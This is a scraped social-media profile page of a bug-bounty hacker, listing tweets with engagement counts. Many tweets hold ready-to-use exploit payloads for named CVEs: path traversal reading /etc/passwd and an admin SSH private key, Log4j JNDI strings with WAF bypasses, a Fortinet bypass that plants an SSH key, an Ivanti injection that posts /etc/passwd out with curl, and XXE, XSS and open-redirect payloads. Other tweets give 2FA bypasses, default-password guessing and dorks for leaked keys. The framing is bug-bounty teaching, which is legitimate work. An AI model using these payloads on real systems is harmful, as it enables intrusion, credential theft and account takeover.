H4x0r.DZ Profile Banner
H4x0r.DZ Profile
H4x0r.DZ

@h4x0r_dz

53,596
Followers
1,710
Following
1,422
Media
10,050
Statuses

Hack the Planet

Hack The Planet
Joined December 2015
Don't wanna be here? Send us removal request.
@h4x0r_dz
H4x0r.DZ
4 years
A nice tricks to bypass 403/401. #BugBounty #bugbountytips
Tweet media one
Tweet media two
Tweet media three
69
1K
4K
@h4x0r_dz
H4x0r.DZ
2 years
Search for all leaked keys/secrets using one regex! regex: #BugBounty #bugbountytip
Tweet media one
96
747
2K
@h4x0r_dz
H4x0r.DZ
2 years
I wasted my entire life using PuTTY while MobaXterm exist #linux #ssh
Tweet media one
113
265
2K
@h4x0r_dz
H4x0r.DZ
3 years
CVE-2021-41773 POC 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Tweet media one
28
613
2K
@h4x0r_dz
H4x0r.DZ
3 years
If you Are Interested In Developing your Hacking skills Read some amazing @BlackHatEvents pdf <3. Demo Google dork: site: intext:"RCE" filetype:pdf #CyberSecurity #BugBounty #infosec
Tweet media one
16
491
1K
@h4x0r_dz
H4x0r.DZ
3 years
Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF :
Tweet media one
11
442
1K
@h4x0r_dz
H4x0r.DZ
3 years
Grafana Exploit POC $HOST/public/plugins/graph/../../../../../../../../etc/passwd
Tweet media one
14
417
1K
@h4x0r_dz
H4x0r.DZ
2 years
CVE-2022-40684 ffuf -w "host_list.txt:URL" -u " https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r
Tweet media one
30
364
1K
@h4x0r_dz
H4x0r.DZ
4 months
LOL
Tweet media one
@h4x0r_dz
H4x0r.DZ
5 months
why there is an RCE on Microsoft? #infosec
Tweet media one
30
39
499
13
43
1K
@h4x0r_dz
H4x0r.DZ
2 years
A hacker with his Zero-day🥰 #infosec #Security #CyberAttack
32
179
1K
@h4x0r_dz
H4x0r.DZ
5 months
Find Leaked Credentials Using Google Chrome dev Tools (The Best Way 😎) #bugbountytips #bugbounty #infosec
Tweet media one
12
272
1K
@h4x0r_dz
H4x0r.DZ
4 years
when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character. try to bypassed using other Unicode characters. I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82". poc: redirect_to=////evil%E3%80%82com #BugBounty #bugbountytip
Tweet media one
9
281
931
@h4x0r_dz
H4x0r.DZ
3 months
Getting the maximum impact : read the SSH PRIVATE KEY: aCSHELL/../../../../../../../home/admin/.ssh/id_rsa connect to the server : ssh admin @127 .0.0.1 -i id_rsa
Tweet media one
@h4x0r_dz
H4x0r.DZ
3 months
why the fuck SSL VPN softwares are vulnerable to path traversal in the body lol. CVE-2024-24919 Check Point Remote Access #infosec #bugounty #cyberattack I feel like these are backdoors, not bugs LOL
Tweet media one
22
134
696
17
177
900
@h4x0r_dz
H4x0r.DZ
3 years
In this tweet, I will explain to you How to find Leaking AWS Keys.
Tweet media one
19
334
799
@h4x0r_dz
H4x0r.DZ
3 years
always when you found API endpoint like "/api/v4/anything" add "internal" to the route and you will be surprised 😃 for example : /api/v4/users/<userid> =>> 403 /api/v4/internal/users/<userid> =>> 200 #bugbountytips
10
256
782
@h4x0r_dz
H4x0r.DZ
2 years
I learned hacking by doing hacking! No CTF, certificate ,university...etc We are not the same, you are better than me #infosec
33
66
753
@h4x0r_dz
H4x0r.DZ
2 years
if this #TikTokBreach is true! it gonna be a bad week
Tweet media one
Tweet media two
13
188
750
@h4x0r_dz
H4x0r.DZ
2 years
44
152
737
@h4x0r_dz
H4x0r.DZ
4 years
#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png
6
253
724
@h4x0r_dz
H4x0r.DZ
2 years
19
169
693
@h4x0r_dz
H4x0r.DZ
3 months
why the fuck SSL VPN softwares are vulnerable to path traversal in the body lol. CVE-2024-24919 Check Point Remote Access #infosec #bugounty #cyberattack I feel like these are backdoors, not bugs LOL
Tweet media one
@h4x0r_dz
H4x0r.DZ
5 months
why the fuck SSL VPN softwares are vulnerable to path traversal in the Cookie lol. CVE-2024-3400 GlobalProtect
3
12
161
22
134
696
@h4x0r_dz
H4x0r.DZ
2 years
We are Shopify, not Spotify 🤣
Tweet media one
26
46
669
@h4x0r_dz
H4x0r.DZ
2 years
Backup Files (does not exist on any Fuzzing wordlist ! ) hostname*com/hostname.rar , .sql.tar & .tar.gz & .tar.bzip2 & .tar & .sql.bz2 & .7z & .tar.bz2 & .sql.7z ....etc already found so many WordPress websites backups #bugbountytips
Tweet media one
15
176
653
@h4x0r_dz
H4x0r.DZ
3 months
XSS.exe
Tweet media one
41
18
664
@h4x0r_dz
H4x0r.DZ
2 years
I don't want to live in The matrix anymore This is the real Life :
Tweet media one
39
20
650
@h4x0r_dz
H4x0r.DZ
3 years
Some Devs use "Google Groups" as a workplace because it is easy and free. But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc . Dork: site: "$COMPANY" I already found a lot of leaked critical data #bugbountytips
Tweet media one
21
193
645
@h4x0r_dz
H4x0r.DZ
4 months
many APIs are vulnerable to "JSON Patch" where you have access to the op, you can add, remove, replace, move, copy example : { "op": "replace", "path": "/role", "value": "admin" }, more info : #BugBounty #bugbountytips
Tweet media one
7
158
623
@h4x0r_dz
H4x0r.DZ
2 years
I moved From bug bounty to ctf And I can confirm CTF is the real hacking, A bug bounty is just an easy game compared to ctf bug bounty : vulnerability assessment CTF : real hacking
74
44
607
@h4x0r_dz
H4x0r.DZ
3 years
GET /api/users/1337 => 401 GET /api/users/ x-user-id: 1337 =>> 200 Ok POST /api/users/<myID>/password-reset x-user-id: <victimID> full account takeover :) . #bugbountytips
Tweet media one
8
196
600
@h4x0r_dz
H4x0r.DZ
4 years
A simple way helped me to find more endpoints/info about #bugbounty target. maybe can help you! site: "target" site: "target" #PenTest #bugbountytip #OSINT #infosec
Tweet media one
Tweet media two
9
199
603
@h4x0r_dz
H4x0r.DZ
7 months
CVE-2024-22024, XXE on Ivanti Connect Secure payload encoded base64: <?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM " http://{{external-host}}/x"> %xxe;]><r></r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm #bugbountytips #cve #Ivanti
Tweet media one
4
140
606
@h4x0r_dz
H4x0r.DZ
2 years
/..;/
Tweet media one
20
132
588
@h4x0r_dz
H4x0r.DZ
4 years
I have a friend who joins #bugbounty Because of me. He didn't have good internet and no PC. just using his phone. He found 5 bugs using his phone with the worst internet in the world (Algeria). I really feel proud of this boy <3 .
Tweet media one
Tweet media two
32
58
583
@h4x0r_dz
H4x0r.DZ
2 years
People Who Doing Bug Bounty For Red Bull please stop. You Are Destroying The Field Don't Do Bug Bounty For Free & Drink & T-shirts ...etc When Companies Find Stupid Hackers Like You Who Work For Free, Many Other Companies Will Join The Club. please stop #BugBounty
33
95
577
@h4x0r_dz
H4x0r.DZ
22 days
DEF CON 32 presentations if anyone missed them.. #infosec
Tweet media one
5
160
589
@h4x0r_dz
H4x0r.DZ
3 years
Unknown recon Method via waybackurls $TARGET.app.box.com or just use google DORK : site: "$TARGET" Sometimes the employees upload sensitive files to the public on . #bugbountytips #bugbounty
Tweet media one
Tweet media two
6
202
552
@h4x0r_dz
H4x0r.DZ
3 years
Yay, I was awarded a $20,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder admin panel pwn > file upload > Arbitrary File Overwrite tip: read js files well!
42
41
544
@h4x0r_dz
H4x0r.DZ
6 months
what an incredible auth bypass! /foo?jsp=/authenticated-endpoint;.jsp CVE-2024-27198 TeamCity authentication bypass
Tweet media one
8
128
552
@h4x0r_dz
H4x0r.DZ
16 days
I ranked #1 in both Reports and Reputation and placed #14 overall at the Live Hacking Event #H1 -702 in Las Vegas by HackerOne. During the event, I Reported [Critical/High/Medium/low] vulnerabilities in TikTok and Epic Games. This was my first Live Hacking Event, and I'm really
Tweet media one
47
13
548
@h4x0r_dz
H4x0r.DZ
4 months
Holy shit, CVE-2024-4367 PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF #infosec
8
112
545
@h4x0r_dz
H4x0r.DZ
2 years
My Goal for the 2023 is to quit bug bounty | cybersecurity and other computer stuff and buy a farm and 10 cows 🐄 and 100 chickens and 1337 sheep . I'm still looking for the happiness ✍️
49
32
535
@h4x0r_dz
H4x0r.DZ
5 months
I used BBOT to enumerate subdomains, and I found New subs I had never seen in My Targets! Very Very useful on Large targets #BugBounty #bugbountytips #infosec
Tweet media one
14
112
529
@h4x0r_dz
H4x0r.DZ
8 months
Jenkins CVE-2024-23897 Arbitrary file read vulnerability through the CLI can lead to RCE POC #BugBounty #vulnerabilities #rce
Tweet media one
12
82
512
@h4x0r_dz
H4x0r.DZ
4 years
Scanning APK file for URIs, endpoints & secrets Using APKLeaks by @dwisiswant0 1.install APKLeaksby 2. Download the APK file. 3. python3 -f app.apk Easy win <3. #bugbountytips #BugsBunny #infosec
Tweet media one
7
198
499
@h4x0r_dz
H4x0r.DZ
1 year
I hacked Shopify/Spotify in the same day lol
Tweet media one
18
7
495
@h4x0r_dz
H4x0r.DZ
8 months
#bugbountytips There is a lot of web apps vulnerable to this issue
Tweet media one
@h4x0r_dz
H4x0r.DZ
8 months
Ok, here is another #bugbountytip You can find this issue with “login with Google ” too, or any other Idp providers During the signup process, delete the email value from the scope 💣
4
34
192
16
88
506
@h4x0r_dz
H4x0r.DZ
4 years
Thousands of US companies have been hacked by Chinese hackers using This RCE. Microsoft Exchange Server Remote Code Execution CVE-2021-26855 Exploit. #BugBounty #RCE #infosec
Tweet media one
Tweet media two
Tweet media three
Tweet media four
14
191
491
@h4x0r_dz
H4x0r.DZ
7 months
CVE-2024-21893 Ivanti Connect Secure SSRF to CVE-2024-21887 RCE http://127.0.0.1:8090/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd ;
Tweet media one
Tweet media two
9
110
499
@h4x0r_dz
H4x0r.DZ
5 months
why there is an RCE on Microsoft? #infosec
Tweet media one
30
39
499
@h4x0r_dz
H4x0r.DZ
3 years
Automation Time-based Blind SQL injection on HTTP Headers Using Blisqy tool by @JohnTroony . #BugBounty #bugbountytip
Tweet media one
7
216
477
@h4x0r_dz
H4x0r.DZ
3 months
Stop running the Python web server in the root directory. it is funny because most of these IPs are related to C&C LOl #infosec #cyberattack
Tweet media one
Tweet media two
9
47
474
@h4x0r_dz
H4x0r.DZ
1 year
Unfortunately, this was submitted previously by another researcher, but we appreciate your work and look forward to additional reports from you.
Tweet media one
36
58
472
@h4x0r_dz
H4x0r.DZ
2 months
Officially I'm a Certified Ethical Hacker ! I do not recommend a CEH.exe V12 certificate to anyone. it is a waste of time. very old content. Labs Based on a browser with no VPN (the worst labs ever ). this certificate is a waste of Money time & energy. #infosec
Tweet media one
53
19
474
@h4x0r_dz
H4x0r.DZ
2 months
Template Injection on ServiceNow by @assetnote http://1337/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style> #bugbounty #infosec
Tweet media one
8
96
468
@h4x0r_dz
H4x0r.DZ
11 months
We stand in solidarity with the people of Palestine 🇵🇸
20
45
450
@h4x0r_dz
H4x0r.DZ
4 months
I'm curious why @ECCOUNCIL offers such expensive certifications when they seem ineffective in cybersecurity. I'm currently taking the CEH course, and the browser-based lab keeps crashing. The PDF is over 2000 pages, with much of the content appearing to be copied from Google
Tweet media one
33
57
448
@h4x0r_dz
H4x0r.DZ
2 years
How to use FFUF over multiple hosts $ for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done #bugbountytips #BugBounty #ffuf
Tweet media one
Tweet media two
18
160
443
@h4x0r_dz
H4x0r.DZ
8 months
Someone claims he has root access to @RealTryHackMe servers he is selling it for 5k$ !
Tweet media one
Tweet media two
31
47
444
@h4x0r_dz
H4x0r.DZ
8 months
GitLab CE/EE Account Takeover via Password Reset without user interactions CVE-2023-7028 Poc: in the rest password endpoint user[email][]=valid @email .com&user[email][]=attacker @email .com #bugbountytip
6
89
443
@h4x0r_dz
H4x0r.DZ
4 years
Recon 😂😂👌
Tweet media one
15
64
420
@h4x0r_dz
H4x0r.DZ
1 year
I'm happy to share that I got OSCP Certificate for the first attempt. Thanks @offsectraining for the training #CyberSecurity #oscp
Tweet media one
55
5
420
@h4x0r_dz
H4x0r.DZ
2 years
beg BOUNTY 🤡 #infosec #bugbounty
Tweet media one
52
46
413
@h4x0r_dz
H4x0r.DZ
4 years
I just found Open Redirection on public #bugbounty program. I tried all Open Redirect payload {that I know}, and nothing work, only one payload: redirect_to=//evil.com\ @whiteliste .com I hope this will help you :). #bugbountytip
Tweet media one
7
115
409
@h4x0r_dz
H4x0r.DZ
3 years
infinite money printing bug on Coinbase. awarded $250k to the hacker POC :
Tweet media one
14
93
409
@h4x0r_dz
H4x0r.DZ
2 years
POC, CVE-2022-1388 F5 Big-IP RCE
Tweet media one
9
102
408
@h4x0r_dz
H4x0r.DZ
2 months
If you analyze JavaScript files using Burp Suite and use tools like GAP JS Miner, always replace `^If-None-Match.*$` with an empty string to load the files in Burp. Otherwise, on subsequent loads, you'll always get a 304 Not Modified response. #bugbountytips
Tweet media one
8
63
408
@h4x0r_dz
H4x0r.DZ
3 years
technique to bypass 2FA I did not saw it In any place. please tell me If it's public. steps : 1. enable 2FA In your account 2. login and send the 2FA code to your email & SMS. 3. Wait until the code 2FA expires (it's Depends ..) 4.put any code. 5. b00M! #bugbountytips
Tweet media one
21
138
389
@h4x0r_dz
H4x0r.DZ
4 years
403 ?? Try This: .git/branches/ .git/COMMIT_EDITMSG .git/config .git/description .git/FETCH_HEAD .git/HEAD .git/hooks/ .git/index .git/info/ .git/info/exclude .git/logs/ .git/logs/HEAD .git/logs/refs .git/logs/refs/heads .git/logs/refs/heads/master [1]
2
159
387
@h4x0r_dz
H4x0r.DZ
3 months
Doing Active Directory pentesting
10
20
394
@h4x0r_dz
H4x0r.DZ
2 years
Is it possible to get a job in cybersecurity without certifications ? #bugbountytips #infosec #cybersecurity
117
37
395
@h4x0r_dz
H4x0r.DZ
2 years
20,000 person follow me , I don't know why there is so many people follow this useless guy. I don't deserve all these followers at all, but thanks everyone
Tweet media one
35
12
371
@h4x0r_dz
H4x0r.DZ
1 month
you have a big js file ? no time to analyze it all search for these : URLSearchParams window.location URL.searchParams fetch() XMLHttpRequest FormData window.location.hash window.location.href URL.hash #bugbountytips
3
74
376
@h4x0r_dz
H4x0r.DZ
2 years
Tweet media one
11
42
355
@h4x0r_dz
H4x0r.DZ
4 months
CVE-2024-27130, an unauthenticated stack overflow bug, which allows remote-code execution on qnap credit @watchtowrcyber Yes Yes it is Friday , the perfect day to drop the 0day
Tweet media one
0
66
372
@h4x0r_dz
H4x0r.DZ
4 months
CVE-2024-34351 : Server-Side Request Forgery on Next.js POC: POST /x HTTP/2 Host: attacker*com Content-Length: 2 Next-Action: xxxx {} #BugBounty #bugbountytips
Tweet media one
3
68
367
@h4x0r_dz
H4x0r.DZ
11 months
Bombing a hospital is a war crime, Israel is a terrorist
13
77
346
@h4x0r_dz
H4x0r.DZ
2 years
Cross Site Request Forgery (CSRF) is dead!
32
28
349
@h4x0r_dz
H4x0r.DZ
1 year
Tweet media one
70
35
355
@h4x0r_dz
H4x0r.DZ
2 years
CVE-2022-26134 Confluence RCE exploit automation : httpx -l list.txt -paths path.txt -match-string "gid="
5
105
354
@h4x0r_dz
H4x0r.DZ
3 years
Tweet media one
8
83
355
@h4x0r_dz
H4x0r.DZ
5 months
Yay, I was awarded a $5,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder out-of-bounds write in Fortinet CVE-2024-21762 👀
20
12
348
@h4x0r_dz
H4x0r.DZ
2 years
CVE-2022-44268 ImageMagick Arbitrary File Read
8
64
341
@h4x0r_dz
H4x0r.DZ
11 months
Tweet media one
6
59
331
@h4x0r_dz
H4x0r.DZ
9 months
RCE via insecure ~/.ssh/config #infosecurity #CyberSecurity
Tweet media one
2
71
334
@h4x0r_dz
H4x0r.DZ
6 months
If The target is running the Postgres SQL server put the Unicode char "\u0000" and see the magic 😄 note: this can break the database
9
44
343
@h4x0r_dz
H4x0r.DZ
2 years
bug bounty is just unpaid pentests
11
29
333
@h4x0r_dz
H4x0r.DZ
3 years
Do not forget to Try login with This Credential In your #bugbounty Target : Email: demo@<company>.com & test<company>.com Password: demo@<company>.com , 123456789,123456,root, ..other default passwords . You will log in to The Company as an Admin If you are lucky. #bugbountytip
8
110
324
@h4x0r_dz
H4x0r.DZ
2 years
I feel I'm Super Hacker This Morning ! To download java from you need to create account And the steps are so boring so I bypassed the login step 😂
Tweet media one
35
27
325
@h4x0r_dz
H4x0r.DZ
1 year
trick to find hidden endpoints on web apps, start with Underscore (_) ffuf -w wordlist.txt -u #bugbountytip #BugBounty
4
63
321
@h4x0r_dz
H4x0r.DZ
2 years
20 Content spoofing and 80 Clickjacking in one day Expecting 215478$ USD Payload used :- <҉<҉<҉<҉<҉>҉>҉>҉>҉<҉<҉>҉<҉ #bugbountytips
38
42
314
@h4x0r_dz
H4x0r.DZ
4 months
did use njRAT before? #infosec
Tweet media one
57
27
312
@h4x0r_dz
H4x0r.DZ
5 months
c99.php ♥️
Tweet media one
31
22
312